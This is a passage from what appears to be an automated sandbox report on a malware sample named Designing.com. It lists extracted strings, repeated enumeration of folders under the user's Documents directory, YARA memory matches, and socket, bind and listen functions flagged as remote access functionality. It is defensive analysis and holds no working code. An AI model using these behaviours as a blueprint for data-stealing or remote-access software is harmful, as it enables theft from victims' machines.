Source: Brunette.9.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Designing.com Binary or memory string: WIN_XPe
Source: Designing.com Binary or memory string: WIN_VISTA
Source: Designing.com Binary or memory string: WIN_7
Source: Designing.com Binary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\PSAMNLJHZW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\PSAMNLJHZW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\PSAMNLJHZW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\PSAMNLJHZW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\PSAMNLJHZW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\PSAMNLJHZW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: Yara match File source: 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2535381458.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E22263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 12_2_00E22263
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E21C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 12_2_00E21C61
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs